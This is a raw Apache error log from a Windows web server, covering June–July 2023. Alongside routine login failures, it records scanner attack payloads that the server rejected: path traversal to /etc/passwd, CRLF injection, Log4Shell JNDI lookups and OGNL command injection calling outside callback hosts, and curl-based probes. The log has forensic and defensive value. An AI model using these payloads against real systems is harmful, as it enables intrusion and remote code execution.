[Mon Jun 12 09:33:34.419686 2023] [authz_core:error] [pid 3152:tid 1236] [client 41.248.160.42:46666] AH01630: client denied by server configuration: C:/etc
[Mon Jun 12 09:33:34.419686 2023] [authz_core:error] [pid 3152:tid 1248] [client 41.248.160.42:46678] AH01630: client denied by server configuration: C:/etc
[Mon Jun 12 09:33:34.575937 2023] [authz_core:error] [pid 3152:tid 1236] [client 41.248.160.42:46694] AH01630: client denied by server configuration: C:/etc
[Mon Jun 12 15:43:05.879140 2023] [auth_basic:error] [pid 3152:tid 1188] [client 92.154.95.236:39444] AH01614: client used wrong authentication scheme: /
[Tue Jun 13 02:33:57.377404 2023] [authz_core:error] [pid 3152:tid 1228] [client 83.97.73.89:60610] AH01630: client denied by server configuration: C:/bin
[Tue Jun 13 14:42:54.865628 2023] [auth_basic:error] [pid 3152:tid 1220] [client 2.138.196.38:50606] AH01617: user microland: authentication failure for "/": Password Mismatch
[Wed Jun 14 10:51:43.734021 2023] [auth_basic:error] [pid 4756:tid 1440] [client 113.162.49.177:37132] AH01614: client used wrong authentication scheme: /api/get_device_details, referer: https://149.202.94.106/assets/base/home.html
[Wed Jun 14 10:52:08.719656 2023] [cgi:error] [pid 4756:tid 1408] [client 113.162.49.177:38996] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/mt
[Wed Jun 14 10:53:11.416011 2023] [auth_basic:error] [pid 4756:tid 1452] [client 113.162.49.177:36166] AH01618: user user not found: /
[Wed Jun 14 10:53:23.192748 2023] [auth_basic:error] [pid 4756:tid 1444] [client 113.162.49.177:42364] AH01618: user admin not found: /
[Wed Jun 14 10:59:04.370784 2023] [core:error] [pid 4756:tid 1444] (20024)The given path is misformatted or contained invalid characters: [client 113.162.49.177:50764] AH00127: Cannot map GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0 HTTP/1.1 to file
[Wed Jun 14 11:04:29.958590 2023] [core:error] [pid 4756:tid 1444] (22)Invalid argument: [client 113.162.49.177:40600] AH00127: Cannot map GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://ci4nut75suteui8jodeg35um7mh6mfpxh.oast.live+-H+%27User-Agent:+hN6Crq%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://ci4nut75suteui8jodeg9gy3po67wbwqh.oast.live+-H+%27User-Agent:+hN6Crq%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 to file
[Wed Jun 14 11:04:31.786965 2023] [core:error] [pid 4756:tid 1444] (22)Invalid argument: [client 113.162.49.177:40614] AH00127: Cannot map GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://ci4nut75suteui8jodegiipwrhbazt7o7.oast.live+-H+%27User-Agent:+hN6Crq%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://ci4nut75suteui8jodegty8yzey4yasf9.oast.live+-H+%27User-Agent:+hN6Crq%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 to file
[Wed Jun 14 11:05:48.960076 2023] [auth_basic:error] [pid 4756:tid 1440] [client 113.162.49.177:55002] AH01618: user admin not found: /mgmt/shared/authn/login
[Wed Jun 14 11:07:16.092558 2023] [cgi:error] [pid 4756:tid 1452] [client 113.162.49.177:36006] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/slogin
[Wed Jun 14 11:10:58.397490 2023] [core:error] [pid 4756:tid 1440] (20023)The given path was above the root path: [client 113.162.49.177:51888] AH00127: Cannot map GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 to file
[Wed Jun 14 11:11:01.366240 2023] [core:error] [pid 4756:tid 1440] (20023)The given path was above the root path: [client 113.162.49.177:51894] AH00127: Cannot map GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1 to file
[Wed Jun 14 11:11:07.923239 2023] [authz_core:error] [pid 4756:tid 1440] [client 113.162.49.177:51900] AH01630: client denied by server configuration: C:/bin
[Wed Jun 14 11:11:57.506547 2023] [ssl:error] [pid 4756:tid 1452] [client 18.212.77.167:35384] AH02042: rejecting client initiated renegotiation
[Wed Jun 14 11:25:10.920952 2023] [cgi:error] [pid 4756:tid 1444] [client 113.162.49.177:47726] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/admin.cgi
[Wed Jun 14 11:27:20.428993 2023] [auth_basic:error] [pid 4756:tid 1440] [client 113.162.49.177:35696] AH01614: client used wrong authentication scheme: /upload
[Wed Jun 14 11:51:36.794872 2023] [authz_core:error] [pid 4756:tid 1440] [client 83.97.73.89:51628] AH01630: client denied by server configuration: C:/bin
[Wed Jun 14 11:57:11.546658 2023] [cgi:error] [pid 4756:tid 1408] [client 113.162.49.177:38458] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/touchlist_sync.cgi
[Wed Jun 14 11:57:56.434716 2023] [core:error] [pid 4756:tid 1444] (20024)The given path is misformatted or contained invalid characters: [client 113.162.49.177:43488] AH00127: Cannot map GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1 to file
[Wed Jun 14 11:57:58.942266 2023] [core:error] [pid 4756:tid 1444] (20024)The given path is misformatted or contained invalid characters: [client 113.162.49.177:43502] AH00127: Cannot map GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20ci4otkf5sutff8e10orgycuzw9i9em77z.oast.pro%22%29%7D/ HTTP/1.1 to file
[Wed Jun 14 12:02:29.976586 2023] [cgi:error] [pid 4756:tid 1444] [client 113.162.49.177:58092] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/nightled.cgi
[Wed Jun 14 12:09:02.449255 2023] [cgi:error] [pid 4756:tid 1444] [client 113.162.49.177:41524] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/mesh.cgi
[Wed Jun 14 12:11:13.529988 2023] [auth_basic:error] [pid 4756:tid 1408] [client 113.162.49.177:60014] AH01618: user admin not found: /mgmt/tm/util/bash
[Wed Jun 14 12:11:17.420613 2023] [auth_basic:error] [pid 4756:tid 1408] [client 113.162.49.177:50198] AH01618: user admin not found: /mgmt/tm/util/bash
[Wed Jun 14 12:28:37.027670 2023] [cgi:error] [pid 4756:tid 1408] [client 113.162.49.177:50782] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/downloadFlile.cgi
[Wed Jun 14 20:01:48.240919 2023] [cgi:error] [pid 4756:tid 1408] [client 179.43.142.252:58316] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/welcome
[Thu Jun 15 01:41:02.515741 2023] [auth_basic:error] [pid 4756:tid 1452] [client 113.186.183.80:60356] AH01618: user admin not found: /mgmt/tm/util/bash
[Thu Jun 15 02:09:44.520420 2023] [cgi:error] [pid 4756:tid 1448] [client 113.186.183.80:37280] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/mesh.cgi
[Thu Jun 15 02:11:21.653011 2023] [cgi:error] [pid 4756:tid 1408] [client 113.186.183.80:41986] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/nightled.cgi
[Thu Jun 15 02:16:16.858488 2023] [cgi:error] [pid 4756:tid 1408] [client 113.186.183.80:35286] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/touchlist_sync.cgi
[Thu Jun 15 02:25:00.048490 2023] [core:error] [pid 4756:tid 1448] (20024)The given path is misformatted or contained invalid characters: [client 113.186.183.80:47120] AH00127: Cannot map GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1 to file
[Thu Jun 15 02:25:02.988297 2023] [core:error] [pid 4756:tid 1448] (20024)The given path is misformatted or contained invalid characters: [client 113.186.183.80:47134] AH00127: Cannot map GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20ci5qd475sutcj6pbifv0ccz4zzk97xx3p.oast.live%22%29%7D/ HTTP/1.1 to file
[Thu Jun 15 02:28:41.166121 2023] [auth_basic:error] [pid 4756:tid 1408] [client 113.186.183.80:36112] AH01618: user admin not found: /mgmt/tm/util/bash
[Thu Jun 15 02:28:46.712996 2023] [auth_basic:error] [pid 4756:tid 1408] [client 113.186.183.80:58500] AH01618: user admin not found: /mgmt/tm/util/bash
[Thu Jun 15 02:29:52.137949 2023] [cgi:error] [pid 4756:tid 1448] [client 113.186.183.80:42638] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/downloadFlile.cgi
[Thu Jun 15 08:25:33.523805 2023] [authz_core:error] [pid 4756:tid 1448] [client 185.243.114.110:45124] AH01630: client denied by server configuration: C:/bin
[Thu Jun 15 08:34:42.083784 2023] [auth_basic:error] [pid 4756:tid 1448] [client 2.138.196.38:49864] AH01618: user microland2012Ntmkdpi not found: /
[Thu Jun 15 16:18:08.813877 2023] [core:error] [pid 4756:tid 1440] (20023)The given path was above the root path: [client 209.141.40.64:55152] AH00127: Cannot map GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1 to file
[Thu Jun 15 16:18:09.267001 2023] [authz_core:error] [pid 4756:tid 1440] [client 209.141.40.64:55158] AH01630: client denied by server configuration: C:/etc
[Thu Jun 15 16:18:09.751338 2023] [authz_core:error] [pid 4756:tid 1440] [client 209.141.40.64:55164] AH01630: client denied by server configuration: C:/etc
[Thu Jun 15 16:18:10.220125 2023] [core:error] [pid 4756:tid 1440] (20024)The given path is misformatted or contained invalid characters: [client 209.141.40.64:55178] AH00127: Cannot map GET /cgi-bin/.%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 to file
[Thu Jun 15 16:18:10.688875 2023] [authz_core:error] [pid 4756:tid 1440] [client 209.141.40.64:55188] AH01630: client denied by server configuration: C:/etc
[Thu Jun 15 17:56:37.417614 2023] [authz_core:error] [pid 4756:tid 1440] [client 83.97.73.89:53316] AH01630: client denied by server configuration: C:/bin
[Thu Jun 15 20:21:32.811496 2023] [cgi:error] [pid 4756:tid 1440] [client 141.98.6.35:58934] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/welcome
[Fri Jun 16 08:56:28.429950 2023] [auth_basic:error] [pid 4756:tid 1448] [client 195.170.172.128:35534] AH01618: user 1Fi4PFM3ccct9hfB8G4mjNAb86GA3canz7 not found: /
[Fri Jun 16 08:56:34.041463 2023] [auth_basic:error] [pid 4756:tid 1448] [client 195.170.172.128:41494] AH01618: user 0xeb6b8df50f89ddcaf42a5eece4c10fc37a2962f1 not found: /
[Fri Jun 16 22:28:07.626636 2023] [authz_core:error] [pid 4756:tid 1444] [client 83.97.73.89:47850] AH01630: client denied by server configuration: C:/bin
[Sun Jun 18 13:26:23.294277 2023] [authz_core:error] [pid 4756:tid 1436] [client 41.92.0.216:19490] AH01630: client denied by server configuration: C:/bin
[Sun Jun 18 22:10:23.990870 2023] [authz_core:error] [pid 4756:tid 1420] [client 83.97.73.89:53914] AH01630: client denied by server configuration: C:/bin
[Mon Jun 19 10:44:52.494980 2023] [core:error] [pid 4756:tid 1428] (20024)The given path is misformatted or contained invalid characters: [client 34.124.185.168:34498] AH00127: Cannot map GET /${jndi:ldap://108.181.33.59:1389/Exploit} HTTP/1.1 to file
[Mon Jun 19 11:05:15.663266 2023] [authz_core:error] [pid 4756:tid 1428] [client 60.186.203.106:51088] AH01630: client denied by server configuration: C:/etc
[Mon Jun 19 11:05:19.819515 2023] [authz_core:error] [pid 4756:tid 1428] [client 60.186.203.106:52226] AH01630: client denied by server configuration: C:/bin
[Mon Jun 19 11:09:59.637716 2023] [authz_core:error] [pid 4756:tid 1428] [client 60.186.203.106:3232] AH01630: client denied by server configuration: C:/etc
[Mon Jun 19 11:10:00.543966 2023] [authz_core:error] [pid 4756:tid 1428] [client 60.186.203.106:3447] AH01630: client denied by server configuration: C:/bin
[Tue Jun 20 03:57:33.656415 2023] [core:error] [pid 4756:tid 1444] (20024)The given path is misformatted or contained invalid characters: [client 194.113.236.177:38002] AH00127: Cannot map GET /${jndi:ldap://34.124.185.168:8081/Exploit} HTTP/1.1 to file
[Tue Jun 20 04:19:43.032964 2023] [core:error] [pid 4756:tid 1408] (20024)The given path is misformatted or contained invalid characters: [client 161.189.118.4:52754] AH00127: Cannot map GET /${jndi:ldap://34.124.185.168:8081/Exploit} HTTP/1.1 to file
[Tue Jun 20 09:03:43.827481 2023] [core:error] [pid 4756:tid 1428] (20023)The given path was above the root path: [client 39.39.170.185:25716] AH00127: Cannot map GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 to file
[Tue Jun 20 09:03:44.530607 2023] [core:error] [pid 4756:tid 1428] (20023)The given path was above the root path: [client 39.39.170.185:25736] AH00127: Cannot map GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1 to file
[Tue Jun 20 09:03:45.436860 2023] [authz_core:error] [pid 4756:tid 1428] [client 39.39.170.185:25755] AH01630: client denied by server configuration: C:/bin
[Tue Jun 20 09:47:08.902444 2023] [core:error] [pid 4756:tid 1444] (20024)The given path is misformatted or contained invalid characters: [client 116.147.41.142:45060] AH00127: Cannot map GET /${jndi:ldap://34.124.185.168:8081/Exploit} HTTP/1.1 to file
[Tue Jun 20 12:33:55.246084 2023] [core:error] [pid 4756:tid 1444] (20023)The given path was above the root path: [client 39.39.170.185:36165] AH00127: Cannot map GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 to file
[Tue Jun 20 12:33:56.402489 2023] [core:error] [pid 4756:tid 1444] (20023)The given path was above the root path: [client 39.39.170.185:36192] AH00127: Cannot map GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1 to file
[Tue Jun 20 12:33:57.574402 2023] [authz_core:error] [pid 4756:tid 1444] [client 39.39.170.185:36212] AH01630: client denied by server configuration: C:/bin
[Tue Jun 20 13:25:11.778871 2023] [auth_basic:error] [pid 4756:tid 1444] [client 20.212.113.155:1920] AH01618: user hdhjwiudjnn7437@microland.es not found: /99-instalaciones/WAInstall/23.2.1.393/WAInstall_23.2.1.393.exe
[Tue Jun 20 14:56:06.630657 2023] [cgi:error] [pid 4756:tid 1460] [client 144.126.145.102:56104] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Jun 20 21:59:11.264246 2023] [core:error] [pid 4756:tid 1420] (20024)The given path is misformatted or contained invalid characters: [client 177.185.117.136:43044] AH00127: Cannot map GET /${jndi:ldap://34.124.185.168:8081/Exploit} HTTP/1.1 to file
[Wed Jun 21 07:56:24.097372 2023] [core:error] [pid 4756:tid 1428] (20023)The given path was above the root path: [client 173.230.156.75:7505] AH00127: Cannot map GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 to file
[Wed Jun 21 07:56:24.112996 2023] [authz_core:error] [pid 4756:tid 1444] [client 173.230.156.75:24789] AH01630: client denied by server configuration: C:/bin
[Wed Jun 21 08:16:58.417989 2023] [core:error] [pid 4756:tid 1460] (20023)The given path was above the root path: [client 114.214.164.8:56312] AH00127: Cannot map GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 to file
[Wed Jun 21 08:16:58.511710 2023] [authz_core:error] [pid 4756:tid 1444] [client 114.214.164.8:56313] AH01630: client denied by server configuration: C:/bin
[Wed Jun 21 08:27:15.188731 2023] [authz_core:error] [pid 4756:tid 1460] [client 83.97.73.89:35614] AH01630: client denied by server configuration: C:/bin
[Wed Jun 21 08:40:49.056083 2023] [core:error] [pid 4756:tid 1460] (20023)The given path was above the root path: [client 114.214.164.8:1941] AH00127: Cannot map GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 to file
[Wed Jun 21 08:40:49.056083 2023] [authz_core:error] [pid 4756:tid 1444] [client 114.214.164.8:1940] AH01630: client denied by server configuration: C:/bin
[Wed Jun 21 21:01:03.899040 2023] [cgi:error] [pid 4756:tid 1444] [client 185.153.197.35:41556] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/sysconf.cgi
[Thu Jun 22 11:46:07.732835 2023] [authz_core:error] [pid 4756:tid 1448] [client 83.97.73.89:37250] AH01630: client denied by server configuration: C:/bin
[Thu Jun 22 15:11:21.691921 2023] [auth_basic:error] [pid 4756:tid 1428] [client 90.169.97.155:51764] AH01618: user MICROLAND not found: /
[Thu Jun 22 21:52:46.802381 2023] [auth_basic:error] [pid 4756:tid 1428] [client 51.89.74.104:20562] AH01618: user admin not found: /
[Fri Jun 23 05:30:33.583597 2023] [cgi:error] [pid 4756:tid 1448] [client 185.180.143.81:58664] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Fri Jun 23 07:02:55.821662 2023] [ssl:error] [pid 4756:tid 1448] [client 3.80.191.253:59032] AH02042: rejecting client initiated renegotiation
[Fri Jun 23 18:28:07.470122 2023] [authz_core:error] [pid 4756:tid 1460] [client 83.97.73.89:59642] AH01630: client denied by server configuration: C:/bin
[Fri Jun 23 21:17:05.784399 2023] [auth_basic:error] [pid 4756:tid 1420] [client 185.174.110.32:62889] AH01618: user admin not found: /
[Sat Jun 24 21:31:23.161673 2023] [auth_basic:error] [pid 4756:tid 1420] [client 154.202.124.48:5593] AH01614: client used wrong authentication scheme: /api/GetRooms/Hot
[Mon Jun 26 16:18:53.482626 2023] [authz_core:error] [pid 4756:tid 1420] [client 83.97.73.89:42914] AH01630: client denied by server configuration: C:/bin
[Wed Jun 28 14:20:08.096649 2023] [cgi:error] [pid 4756:tid 1420] [client 185.180.143.141:43594] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Wed Jun 28 14:21:09.796245 2023] [cgi:error] [pid 4756:tid 1408] [client 185.180.143.141:35946] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/config.exp
[Wed Jun 28 16:30:18.672026 2023] [authz_core:error] [pid 4756:tid 1420] [client 83.97.73.89:53772] AH01630: client denied by server configuration: C:/bin
[Fri Jun 30 18:35:28.643502 2023] [authz_core:error] [pid 4756:tid 1384] [client 83.97.73.89:39586] AH01630: client denied by server configuration: C:/bin
[Sat Jul 01 05:16:17.436090 2023] [auth_basic:error] [pid 4756:tid 1380] [client 103.153.254.110:58158] AH01618: user root not found: /
[Sat Jul 01 06:33:41.747441 2023] [authz_core:error] [pid 4756:tid 1380] [client 84.201.162.108:41524] AH01630: client denied by server configuration: C:/etc
[Sat Jul 01 06:33:41.794315 2023] [authz_core:error] [pid 4756:tid 1380] [client 84.201.162.108:41524] AH01630: client denied by server configuration: C:/bin
[Sat Jul 01 14:10:42.805190 2023] [ssl:error] [pid 4756:tid 1356] [client 3.92.0.231:38274] AH02042: rejecting client initiated renegotiation
[Mon Jul 03 12:10:46.360293 2023] [auth_basic:error] [pid 4756:tid 1380] [client 95.60.153.205:49774] AH01618: user admin not found: /
[Mon Jul 03 12:10:53.485474 2023] [auth_basic:error] [pid 4756:tid 1384] [client 95.60.153.205:49778] AH01618: user admin not found: /
[Tue Jul 04 00:17:30.156190 2023] [core:error] [pid 4756:tid 1380] [client 185.180.140.6:45464] AH10244: invalid URI path (/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/services?/dana/html5acc/guacamole/)
[Tue Jul 04 16:14:37.057119 2023] [auth_basic:error] [pid 4756:tid 1336] [client 2.138.196.38:49871] AH01617: user microland: authentication failure for "/": Password Mismatch
[Tue Jul 04 16:14:44.494873 2023] [auth_basic:error] [pid 4756:tid 1372] [client 2.138.196.38:49875] AH01617: user microland: authentication failure for "/": Password Mismatch
[Tue Jul 04 16:21:08.077284 2023] [auth_basic:error] [pid 4756:tid 1336] [client 2.138.196.38:50305] AH01617: user microland: authentication failure for "/": Password Mismatch
[Tue Jul 04 16:21:15.516695 2023] [auth_basic:error] [pid 4756:tid 1372] [client 2.138.196.38:50307] AH01617: user microland: authentication failure for "/": Password Mismatch
[Tue Jul 04 16:21:24.055560 2023] [auth_basic:error] [pid 4756:tid 1336] [client 2.138.196.38:50308] AH01617: user microland: authentication failure for "/": Password Mismatch
[Tue Jul 04 16:21:38.563817 2023] [auth_basic:error] [pid 4756:tid 1372] [client 2.138.196.38:50309] AH01617: user microland: authentication failure for "/": Password Mismatch
[Wed Jul 05 15:19:08.757086 2023] [authz_core:error] [pid 4756:tid 1336] [client 83.97.73.89:55610] AH01630: client denied by server configuration: C:/bin
[Wed Jul 05 17:34:29.892311 2023] [auth_basic:error] [pid 4756:tid 1336] [client 45.155.204.7:45008] AH01614: client used wrong authentication scheme: /upload
[Fri Jul 07 16:20:47.523538 2023] [authz_core:error] [pid 4756:tid 1380] [client 205.198.121.112:50846] AH01630: client denied by server configuration: C:/bin
[Fri Jul 07 16:20:48.539164 2023] [authz_core:error] [pid 4756:tid 1380] [client 205.198.121.112:51028] AH01630: client denied by server configuration: C:/bin
[Fri Jul 07 16:20:49.540833 2023] [authz_core:error] [pid 4756:tid 1380] [client 205.198.121.112:51192] AH01630: client denied by server configuration: C:/bin
